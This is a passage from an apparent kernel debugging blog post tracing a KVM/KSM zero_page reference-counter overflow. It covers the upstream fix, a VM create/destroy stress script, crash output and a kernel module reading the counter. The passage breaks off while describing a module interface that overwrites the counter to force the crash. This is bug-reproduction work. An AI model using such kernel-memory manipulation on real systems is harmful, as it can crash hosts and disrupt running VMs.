<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">73</span> <span class="k">static</span> <span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="nf">follow_page_pte</span><span class="p">(</span><span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="n">vma</span><span class="p">,</span>
<span class="mi">74</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">address</span><span class="p">,</span> <span class="n">pmd_t</span> <span class="o">*</span><span class="n">pmd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">)</span>
<span class="mi">75</span> <span class="p">{</span>
<span class="p">...</span>
<span class="mi">155</span> <span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&</span> <span class="n">FOLL_GET</span><span class="p">)</span> <span class="p">{</span>
<span class="mi">156</span> <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">try_get_page</span><span class="p">(</span><span class="n">page</span><span class="p">)))</span> <span class="p">{</span>
<span class="mi">157</span> <span class="n">page</span> <span class="o">=</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="o">-</span><span class="n">ENOMEM</span><span class="p">);</span>
<span class="mi">158</span> <span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
<span class="mi">159</span> <span class="p">}</span>
<span class="p">...</span>
</code></pre></div></div>
<p>See the call to <code class="language-plaintext highlighter-rouge">try_get_page()</code>? It also appeared in the <code class="language-plaintext highlighter-rouge">eu-addr2line</code>
output, which told us that we are executing an inlined <code class="language-plaintext highlighter-rouge">try_get_page()</code>.</p>
<p>Let’s look up <code class="language-plaintext highlighter-rouge">try_get_page()</code>. It is located in <code class="language-plaintext highlighter-rouge">include/linux/mm.h:852</code>,
which is mentioned at the top of the oops message:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">849</span> <span class="k">static</span> <span class="kr">inline</span> <span class="n">__must_check</span> <span class="n">bool</span> <span class="nf">try_get_page</span><span class="p">(</span><span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span><span class="p">)</span>
<span class="mi">850</span> <span class="p">{</span>
<span class="mi">851</span> <span class="n">page</span> <span class="o">=</span> <span class="n">compound_head</span><span class="p">(</span><span class="n">page</span><span class="p">);</span>
<span class="mi">852</span> <span class="k">if</span> <span class="p">(</span><span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">page_ref_count</span><span class="p">(</span><span class="n">page</span><span class="p">)</span> <span class="o"><=</span> <span class="mi">0</span><span class="p">))</span>
<span class="mi">853</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="mi">854</span> <span class="nf">page_ref_inc</span><span class="p">(</span><span class="n">page</span><span class="p">);</span>
<span class="mi">855</span> <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="mi">856</span> <span class="err">}</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">if (WARN_ON_ONCE(page_ref_count(page) <= 0))</code> looks like a check to ensure that
this page’s reference counter has not overflowed and wrapped around into negatives.</p>
<p>If we hit this warning and oopsed, then we must have overflowed the page’s
reference counter somehow. We now need to figure out which page, and why.</p>
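<p>To make that concrete, here is a tiny userspace sketch (my own illustration,
not from the kernel) of what a signed 32 bit counter does when it is incremented
past its maximum, which is exactly the condition <code class="language-plaintext highlighter-rouge">page_ref_count(page) <= 0</code>
guards against:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <limits.h>
#include <stdio.h>

int main(void)
{
    /* A 32 bit signed counter sitting at its maximum value. */
    int refcount = INT_MAX;
    printf("before increment: %d\n", refcount);

    /* The kernel builds with -fno-strict-overflow, so atomic_t
     * increments wrap like two's complement; emulate that here with
     * unsigned arithmetic to avoid undefined behaviour in plain C. */
    refcount = (int)((unsigned int)refcount + 1u);
    printf("after increment: %d\n", refcount); /* now negative */
    return 0;
}
</code></pre></div></div>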
<h1 id="finding-the-commit-with-the-fix">Finding the Commit with the Fix</h1>
<p>At this point, I did some searching on some mailing lists, and the upstream kernel
git tree. I got lucky and came across the below commit rather quickly:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit 7df003c85218b5f5b10a7f6418208f31e813f38f
Author: Zhuang Yanying <ann.zhuangyanying@huawei.com>
Date: Sat Oct 12 11:37:31 2019 +0800
Subject: KVM: fix overflow of zero page refcount with ksm running
Link: https://github.com/torvalds/linux/commit/7df003c85218b5f5b10a7f6418208f31e813f38f
</code></pre></div></div>
<p>The description mentions that the patch authors were testing starting and
stopping virtual machines with Kernel Samepage Merging (KSM) enabled on the
compute node. They found a reference counter overflow on the <code class="language-plaintext highlighter-rouge">zero_page</code>:
while handling an EPT violation, the counter gets incremented in
<code class="language-plaintext highlighter-rouge">try_async_pf()</code> but never decremented in <code class="language-plaintext highlighter-rouge">mmu_set_spte()</code>, and both
functions are present in our call trace.</p>
<p>Kernel Samepage Merging is a kernel feature that allows identical pages to be
merged into each other, and is used heavily with KVM. It lets you overcommit the
memory of a compute node, for example, running VMs totalling 100GB of RAM on a
node with only 64GB of physical RAM. It works by merging the “same” pages
together across different virtual machines.</p>
<p>In this case, the problem is centred around the <code class="language-plaintext highlighter-rouge">zero_page</code>, which is special,
as it is a reserved page. When you start a new virtual machine, it requests many
new pages full of zeros. To save space, these pages aren’t actually allocated
up front.</p>
<p>Instead, we use <code class="language-plaintext highlighter-rouge">zero_page</code>. The <code class="language-plaintext highlighter-rouge">zero_page</code> is a page full of zeros. For each
would be newly allocated page that would be full of zeros, we simply set them
to reference the <code class="language-plaintext highlighter-rouge">zero_page</code>. This increments the <code class="language-plaintext highlighter-rouge">zero_page</code> reference counter.</p>
<p>When the VM wants to write data to one of those pages, an EPT violation happens,
and we page fault. This triggers a copy-on-write (COW) action, that allocates a
new page where the data can be written to.</p>
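<p>As a quick aside, this behaviour is easy to watch from userspace. The below is
a minimal sketch of my own, not part of the investigation, showing the read
fault hitting the zero page and the write fault triggering the copy-on-write:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <sys/mman.h>

int main(void)
{
    /* One page of private anonymous memory. */
    unsigned char *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return 1;

    /* Reading first: the kernel services the read fault by mapping
     * the shared zero_page read-only, no real page is allocated. */
    printf("before write: %d\n", p[0]);

    /* Writing triggers a write fault and a copy-on-write: the kernel
     * now allocates a real, private page to hold our data. */
    p[0] = 42;
    printf("after write: %d\n", p[0]);

    munmap(p, 4096);
    return 0;
}
</code></pre></div></div>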
<p>In this case, each time we enter <code class="language-plaintext highlighter-rouge">try_async_pf()</code> we increment the reference
counter for the <code class="language-plaintext highlighter-rouge">zero_page</code>, but it never gets decremented.</p>
<p>The commit description also includes a kernel oops and QEMU crash log, and it
very closely matches what we found in the OpenStack compute node.</p>
<p>Looking at the logs from the compute node, we also see that KSM is enabled on
the system:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat </span>sosreport/sys/kernel/mm/ksm/run
1
</code></pre></div></div>
<p>Looks like we have our root cause.</p>
<p>The fix itself is pretty simple:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
index 7e63a32363640..67ae2d5c37b23 100644
--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
@@ -186,6 +186,7 @@ bool kvm_is_reserved_pfn(kvm_pfn_t pfn)
*/
if (pfn_valid(pfn))
return PageReserved(pfn_to_page(pfn)) &&
+ !is_zero_pfn(pfn) &&
!kvm_is_zone_device_pfn(pfn);
return true;
</code></pre></div></div>
<p>The fix stops treating the <code class="language-plaintext highlighter-rouge">zero_page</code> as reserved in <code class="language-plaintext highlighter-rouge">kvm_is_reserved_pfn()</code>,
which means KVM’s release paths now drop the reference they took on it, keeping
the counter balanced.</p>
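<p>To see why the reference was leaking in the first place, it helps to look at
the release side. In the 4.15 tree, <code class="language-plaintext highlighter-rouge">kvm_release_pfn_clean()</code> looks roughly
like the below, so any pfn that <code class="language-plaintext highlighter-rouge">kvm_is_reserved_pfn()</code> claims is reserved
never has its reference dropped:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* virt/kvm/kvm_main.c (4.15, paraphrased): the reference taken when
 * the pfn was looked up is only dropped for non-reserved pages. With
 * the zero_page wrongly treated as reserved, put_page() never runs,
 * and every EPT violation leaks one reference. */
void kvm_release_pfn_clean(kvm_pfn_t pfn)
{
	if (!is_error_noslot_pfn(pfn) && !kvm_is_reserved_pfn(pfn))
		put_page(pfn_to_page(pfn));
}
</code></pre></div></div>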
<h1 id="attempting-to-reproduce-the-problem">Attempting to Reproduce the Problem</h1>
<p>At this point, I went and built a test kernel based on 4.15.0-106-generic and
included the commit we found. But we now need to reproduce the problem to prove
that the commit actually fixes it.</p>
<p>The commit mentions some instructions on how to reproduce the problem:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>step1:
echo 10000 > /sys/kernel/pages_to_scan/pages_to_scan
echo 1 > /sys/kernel/pages_to_scan/run
echo 1 > /sys/kernel/pages_to_scan/use_zero_pages
step2:
just create several normal qemu kvm vms.
And destroy it after 10s.
Repeat this action all the time.
</code></pre></div></div>
<p>Okay, so it ups the number of pages to scan, enables KSM and the <code class="language-plaintext highlighter-rouge">use_zero_pages</code>
feature. From there I need to create and destroy a bunch of virtual machines
in a loop. It doesn’t sound too hard.</p>
<p>Remember that the OpenStack compute node had an uptime of 37 days, and that the
reference counter is a signed 32 bit atomic_t variable, which means we would need
~2.1 billion increments to wrap the reference counter into negatives.</p>
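<p>A quick back-of-the-envelope calculation, just to get a feel for the numbers,
shows the sustained increment rate needed to get there in 37 days:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>

int main(void)
{
    /* A signed 32 bit counter wraps negative after 2^31 increments. */
    const double wrap = 2147483648.0;
    const double uptime = 37.0 * 86400.0; /* ~37 days in seconds */

    /* Prints roughly 672 increments per second, sustained for over
     * a month, which a busy compute node can plausibly manage. */
    printf("%.0f increments/second to wrap in 37 days\n", wrap / uptime);
    return 0;
}
</code></pre></div></div>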
<p>This might take a while.</p>
<p>I wrote a script that uses libvirt to create and destroy virtual machines,
which runs more or less forever:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
<span class="c"># Script to start and stop KVM virtual machines to try trigger Kernel Samepage</span>
<span class="c"># Mapping zero_page reference counter overflow.</span>
<span class="c">#</span>
<span class="c"># Author: Matthew Ruffell <matthew.ruffell@canonical.com></span>
<span class="c"># BugLink: https://bugs.launchpad.net/bugs/1837810</span>
<span class="c">#</span>
<span class="c"># Fix: https://github.com/torvalds/linux/commit/7df003c85218b5f5b10a7f6418208f31e813f38f</span>
<span class="c">#</span>
<span class="c"># Instructions:</span>
<span class="c"># ./ksm_refcnt_overflow.sh</span>
<span class="c"># Install QEMU KVM if needed</span>
<span class="nb">sudo </span>apt <span class="nb">install</span> <span class="nt">-y</span> qemu-kvm libvirt-bin qemu-utils genisoimage virtinst
<span class="c"># Enable Kernel Samepage Mapping, use zero_pages</span>
<span class="nb">echo </span>10000 | <span class="nb">sudo tee</span> /sys/kernel/mm/ksm/pages_to_scan
<span class="nb">echo </span>1 | <span class="nb">sudo tee</span> /sys/kernel/mm/ksm/run
<span class="nb">echo </span>1 | <span class="nb">sudo tee</span> /sys/kernel/mm/ksm/use_zero_pages
<span class="c"># Download OS image</span>
wget https://cloud-images.ubuntu.com/xenial/current/xenial-server-cloudimg-amd64-disk1.img
<span class="nb">sudo mkdir</span> /var/lib/libvirt/images/base
<span class="nb">sudo mv </span>xenial-server-cloudimg-amd64-disk1.img /var/lib/libvirt/images/base/ubuntu-16.04.qcow2
<span class="k">function </span>destroy_all_vms<span class="o">()</span> <span class="o">{</span>
<span class="k">for </span>i <span class="k">in</span> <span class="sb">`</span><span class="nb">sudo </span>virsh list | <span class="nb">grep </span>running | <span class="nb">awk</span> <span class="s1">'{print $2}'</span><span class="sb">`</span>
<span class="k">do
</span>virsh shutdown <span class="nv">$i</span> &> /dev/null
virsh destroy <span class="nv">$i</span> &> /dev/null
virsh undefine <span class="nv">$i</span> &> /dev/null
<span class="nb">sudo rm</span> <span class="nt">-rf</span> /var/lib/libvirt/images/<span class="nv">$i</span>
<span class="k">done</span>
<span class="o">}</span>
<span class="k">function </span>create_single_vm<span class="o">()</span> <span class="o">{</span>
<span class="nb">sudo mkdir</span> /var/lib/libvirt/images/instance-<span class="nv">$1</span>
<span class="nb">sudo cp</span> /var/lib/libvirt/images/base/ubuntu-16.04.qcow2 /var/lib/libvirt/images/instance-<span class="nv">$1</span>/instance-<span class="nv">$1</span>.qcow2
virt-install <span class="nt">--connect</span> qemu:///system <span class="se">\</span>
<span class="nt">--virt-type</span> kvm <span class="se">\</span>
<span class="nt">--name</span> instance-<span class="nv">$1</span> <span class="se">\</span>
<span class="nt">--ram</span> 1024 <span class="se">\</span>
<span class="nt">--vcpus</span><span class="o">=</span>1 <span class="se">\</span>
<span class="nt">--os-type</span> linux <span class="se">\</span>
<span class="nt">--os-variant</span> ubuntu16.04 <span class="se">\</span>
<span class="nt">--disk</span> <span class="nv">path</span><span class="o">=</span>/var/lib/libvirt/images/instance-<span class="nv">$1</span>/instance-<span class="nv">$1</span>.qcow2,format<span class="o">=</span>qcow2 <span class="se">\</span>
<span class="nt">--import</span> <span class="se">\</span>
<span class="nt">--network</span> <span class="nv">network</span><span class="o">=</span>default <span class="se">\</span>
<span class="nt">--noautoconsole</span> &> /dev/null
<span class="o">}</span>
<span class="k">function </span>create_destroy_loop<span class="o">()</span> <span class="o">{</span>
<span class="nv">NUM</span><span class="o">=</span><span class="s2">"0"</span>
<span class="k">while </span><span class="nb">true
</span><span class="k">do
</span><span class="nv">NUM</span><span class="o">=</span><span class="nv">$[$NUM</span> + 1]
<span class="nb">echo</span> <span class="s2">"Run #</span><span class="nv">$NUM</span><span class="s2">"</span>
<span class="k">for </span>i <span class="k">in</span> <span class="o">{</span>0..7<span class="o">}</span>
<span class="k">do
</span>create_single_vm <span class="nv">$i</span>
<span class="nb">echo</span> <span class="s2">"Created instance </span><span class="nv">$i</span><span class="s2">"</span>
<span class="nb">sleep </span>10
<span class="k">done
</span><span class="nb">sleep </span>30
<span class="nb">echo</span> <span class="s2">"Destroying all VMs"</span>
destroy_all_vms
<span class="k">done</span>
<span class="o">}</span>
create_destroy_loop
</code></pre></div></div>
<p>You can download the script <a href="/assets/bin/ksm_refcnt_overflow.sh">here</a>.</p>
<p>The script installs and sets up KVM, makes sure that KSM is enabled, and gets
busy creating and destroying virtual machines every 10 seconds or so.</p>
<p>I provisioned a lab machine that was a bit more beefy than usual and started
running the script.</p>
<p>I left the lab machine running for a few days, and I checked it every day to see
if it had crashed, or if it was happily creating and destroying virtual machines.</p>
<p>After about 3 or 4 days I got a bit bored, and started wondering if we could
inspect the value of the zero_page reference counter to see how close we were
to overflow.</p>
<p>I was talking to some colleagues, and one mentioned that I should be able to use
<code class="language-plaintext highlighter-rouge">crash</code> to view live kernel memory, as long as I have the right debug kernel.</p>
<p>So, I installed <code class="language-plaintext highlighter-rouge">crash</code> and the debug kernel on the lab machine, and had a look.</p>
<p>Looking at the kernel source code, it seems the kernel allocates the <code class="language-plaintext highlighter-rouge">zero_page</code>
as <code class="language-plaintext highlighter-rouge">empty_zero_page</code>, in <code class="language-plaintext highlighter-rouge">arch/x86/include/asm/pgtable.h</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">43</span> <span class="cm">/*
44 * ZERO_PAGE is a global shared page that is always zero: used
45 * for zero-mapped memory areas etc..
46 */</span>
<span class="mi">47</span> <span class="k">extern</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">empty_zero_page</span><span class="p">[</span><span class="n">PAGE_SIZE</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)]</span>
<span class="mi">48</span> <span class="n">__visible</span><span class="p">;</span>
<span class="mi">49</span> <span class="err">#</span><span class="n">define</span> <span class="n">ZERO_PAGE</span><span class="p">(</span><span class="n">vaddr</span><span class="p">)</span> <span class="p">(</span><span class="n">virt_to_page</span><span class="p">(</span><span class="n">empty_zero_page</span><span class="p">))</span>
</code></pre></div></div>
<p>We can look up the memory address of <code class="language-plaintext highlighter-rouge">empty_zero_page</code> with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>crash> x/gx empty_zero_page
0xffffffff9c2ec000: 0x0000000000000000
</code></pre></div></div>
<p>The memory address is <code class="language-plaintext highlighter-rouge">0xffffffff9c2ec000</code>, and the value stored there is
zero, which makes sense for the first word of the zero page.</p>
<p>The next thing to do is to get the populated <code class="language-plaintext highlighter-rouge">struct page</code> for
<code class="language-plaintext highlighter-rouge">empty_zero_page</code>.</p>
<p>It turns out that it’s pretty easy in crash; we can use <code class="language-plaintext highlighter-rouge">kmem</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>crash> kmem 0xffffffff9c2ec000
ffffffff9c2ec000 (b) .bss
PAGE PHYSICAL MAPPING INDEX CNT FLAGS
ffffd85a125e3b00 4978ec000 0 0 3518835 17ffffc0000800 reserved
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">CNT</code> variable is the reference counter for the page struct. In this case,
it’s only 3518835, which is pretty low. It will take months for this to reach
~2.1 billion and overflow.</p>
<p>In the meantime, if we run the <code class="language-plaintext highlighter-rouge">kmem</code> command a few more times:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>crash> kmem 0xffffffff9c2ec000
ffffffff9c2ec000 (b) .bss
PAGE PHYSICAL MAPPING INDEX CNT FLAGS
ffffd85a125e3b00 4978ec000 0 0 3525496 17ffffc0000804 referenced,reserved
crash> kmem 0xffffffff9c2ec000
ffffffff9c2ec000 (b) .bss
PAGE PHYSICAL MAPPING INDEX CNT FLAGS
ffffd85a125e3b00 4978ec000 0 0 3546258 17ffffc0000804 referenced,reserved
</code></pre></div></div>
<p>We can see <code class="language-plaintext highlighter-rouge">CNT</code> increase from 3518835 -> 3525496 -> 3546258. It is steadily
increasing, and never gets smaller. So we can see buggy behaviour, but we
can’t reproduce the failure just yet.</p>
<h1 id="working-smarter-and-reproducing-by-writing-a-kernel-module">Working Smarter and Reproducing by Writing a Kernel Module</h1>
<p>Okay, so we need a way to reproduce the problem faster than just
waiting for it to happen. In this case, we are going to write a kernel module
to read, and hopefully set the value of the reference counter of the <code class="language-plaintext highlighter-rouge">zero_page</code>.</p>
<p>One of my colleagues told me that I can get the page struct for the <code class="language-plaintext highlighter-rouge">zero_page</code>
by calling <code class="language-plaintext highlighter-rouge">virt_to_page()</code> and passing in <code class="language-plaintext highlighter-rouge">empty_zero_page</code>. This is useful,
as the reference counter is the <code class="language-plaintext highlighter-rouge">_refcount</code> member, as shown below:</p>
<p>If we look at <code class="language-plaintext highlighter-rouge">include/linux/mm_types.h</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">42</span> <span class="k">struct</span> <span class="n">page</span> <span class="p">{</span>
<span class="p">...</span>
<span class="mi">81</span> <span class="k">struct</span> <span class="p">{</span>
<span class="mi">82</span>
<span class="mi">83</span> <span class="k">union</span> <span class="p">{</span>
<span class="mi">84</span> <span class="cm">/*
85 * Count of ptes mapped in mms, to show when
86 * page is mapped & limit reverse map searches.
87 *
88 * Extra information about page type may be
89 * stored here for pages that are never mapped,
90 * in which case the value MUST BE <= -2.
91 * See page-flags.h for more details.
92 */</span>
<span class="mi">93</span> <span class="n">atomic_t</span> <span class="n">_mapcount</span><span class="p">;</span>
<span class="mi">94</span>
<span class="mi">95</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">active</span><span class="p">;</span> <span class="cm">/* SLAB */</span>
<span class="mi">96</span> <span class="k">struct</span> <span class="p">{</span> <span class="cm">/* SLUB */</span>
<span class="mi">97</span> <span class="kt">unsigned</span> <span class="n">inuse</span><span class="o">:</span><span class="mi">16</span><span class="p">;</span>
<span class="mi">98</span> <span class="kt">unsigned</span> <span class="n">objects</span><span class="o">:</span><span class="mi">15</span><span class="p">;</span>
<span class="mi">99</span> <span class="kt">unsigned</span> <span class="n">frozen</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>
<span class="mi">100</span> <span class="p">};</span>
<span class="mi">101</span> <span class="kt">int</span> <span class="n">units</span><span class="p">;</span> <span class="cm">/* SLOB */</span>
<span class="mi">102</span> <span class="p">};</span>
<span class="mi">103</span> <span class="cm">/*
104 * Usage count, *USE WRAPPER FUNCTION* when manual
105 * accounting. See page_ref.h
106 */</span>
<span class="mi">107</span> <span class="n">atomic_t</span> <span class="n">_refcount</span><span class="p">;</span>
<span class="mi">108</span> <span class="p">};</span>
<span class="mi">109</span> <span class="p">};</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">_refcount</code> is what we are interested in, since if we remember back to
<code class="language-plaintext highlighter-rouge">try_get_page()</code> and its call to <code class="language-plaintext highlighter-rouge">if (WARN_ON_ONCE(page_ref_count(page) <= 0))</code>,
we can look at the implementation of <code class="language-plaintext highlighter-rouge">page_ref_count()</code> in <code class="language-plaintext highlighter-rouge">include/linux/page_ref.h</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">65</span> <span class="k">static</span> <span class="kr">inline</span> <span class="kt">int</span> <span class="nf">page_ref_count</span><span class="p">(</span><span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span><span class="p">)</span>
<span class="mi">66</span> <span class="p">{</span>
<span class="mi">67</span> <span class="k">return</span> <span class="n">atomic_read</span><span class="p">(</span><span class="o">&</span><span class="n">page</span><span class="o">-></span><span class="n">_refcount</span><span class="p">);</span>
<span class="mi">68</span> <span class="err">}</span>
</code></pre></div></div>
<p>This just does an <code class="language-plaintext highlighter-rouge">atomic_read()</code> on the page struct’s <code class="language-plaintext highlighter-rouge">_refcount</code> member.</p>
<p>Good! Let’s write a kernel module which exposes a <code class="language-plaintext highlighter-rouge">/proc</code> interface which we
can read from, to see the current value of the <code class="language-plaintext highlighter-rouge">zero_page</code> reference counter:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
* zero_page_refcount.c - view zero_page reference counter in real time
* with the proc filesystem.
*
* Author: Matthew Ruffell <matthew.ruffell@canonical.com>
*
* Steps:
*
* $ sudo apt-get -y install gcc make libelf-dev linux-headers-$(uname -r)
*
* cat <<EOF >Makefile
obj-m=zero_page_refcount.o
KVER=\$(shell uname -r)
MDIR=\$(shell pwd)
default:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) modules
clean:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) clean
EOF
*
* $ make
* $ sudo insmod zero_page_refcount.ko
* # To display current zero_page reference count:
* $ cat /proc/zero_page_refcount
*/</span>
<span class="cp">#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
</span>
<span class="cp">#include <linux/atomic.h>
#include <asm/pgtable.h>
</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_show</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span> <span class="o">=</span> <span class="n">virt_to_page</span><span class="p">(</span><span class="n">empty_zero_page</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">reference_count</span> <span class="o">=</span> <span class="n">atomic_read</span><span class="p">(</span><span class="o">&</span><span class="n">page</span><span class="o">-></span><span class="n">_refcount</span><span class="p">);</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Zero Page Refcount: 0x%x or %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">reference_count</span><span class="p">,</span> <span class="n">reference_count</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_open</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="n">single_open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">zero_page_refcount_show</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span> <span class="n">zero_page_refcount_fops</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">owner</span> <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">.</span><span class="n">open</span> <span class="o">=</span> <span class="n">zero_page_refcount_open</span><span class="p">,</span>
<span class="p">.</span><span class="n">read</span> <span class="o">=</span> <span class="n">seq_read</span><span class="p">,</span>
<span class="p">.</span><span class="n">llseek</span> <span class="o">=</span> <span class="n">seq_lseek</span><span class="p">,</span>
<span class="p">.</span><span class="n">release</span> <span class="o">=</span> <span class="n">single_release</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">static</span> <span class="kt">int</span> <span class="n">__init</span> <span class="nf">zero_page_refcount_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="n">proc_create</span><span class="p">(</span><span class="s">"zero_page_refcount"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">zero_page_refcount_fops</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">void</span> <span class="n">__exit</span> <span class="nf">zero_page_refcount_exit</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="n">remove_proc_entry</span><span class="p">(</span><span class="s">"zero_page_refcount"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">MODULE_LICENSE</span><span class="p">(</span><span class="s">"GPL"</span><span class="p">);</span>
<span class="n">module_init</span><span class="p">(</span><span class="n">zero_page_refcount_init</span><span class="p">);</span>
<span class="n">module_exit</span><span class="p">(</span><span class="n">zero_page_refcount_exit</span><span class="p">);</span>
</code></pre></div></div>
<p>The module is pretty simple: we register a read-only <code class="language-plaintext highlighter-rouge">/proc</code> interface called
<code class="language-plaintext highlighter-rouge">/proc/zero_page_refcount</code>. Reading it calls the module function
<code class="language-plaintext highlighter-rouge">zero_page_refcount_show()</code>, which uses <code class="language-plaintext highlighter-rouge">virt_to_page(empty_zero_page)</code> to get
the page struct for the zero page, does an <code class="language-plaintext highlighter-rouge">atomic_read(&page->_refcount)</code>
to get the reference counter, and then prints it out. Easy as.</p>
<p>If you compile it with the following <code class="language-plaintext highlighter-rouge">Makefile</code> (note that the recipe lines must be indented with a tab):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m=zero_page_refcount.o
KVER=\$(shell uname -r)
MDIR=\$(shell pwd)
default:
make -C /lib/modules/\$(KVER)/build M=\$(MDIR) modules
clean:
make -C /lib/modules/\$(KVER)/build M=\$(MDIR) clean
</code></pre></div></div>
<p>with:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>make
<span class="nv">$ </span><span class="nb">sudo </span>insmod zero_page_refcount.ko
</code></pre></div></div>
<p>From there we can query it with:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x687 or 1671
</code></pre></div></div>
<p>If we run it a few times, we can see it increment.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x687 or 1671
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x846 or 2118
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x9f8 or 2552
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0xcb2 or 3250
</code></pre></div></div>
<p>Okay, so our kernel module works. Now, we can go about writing a function to
set the value of the reference counter. I just added another <code class="language-plaintext highlighter-rouge">/proc</code> interface,
called <code class="language-plaintext highlighter-rouge">/proc/zero_page_refcount_set</code>, which uses <code class="language-plaintext highlighter-rouge">virt_to_page(empty_zero_page)</code>
to get the page struct, and <code class="language-plaintext highlighter-rouge">atomic_set(&page->_refcount, 0xFFFF7FFFFF00)</code> to
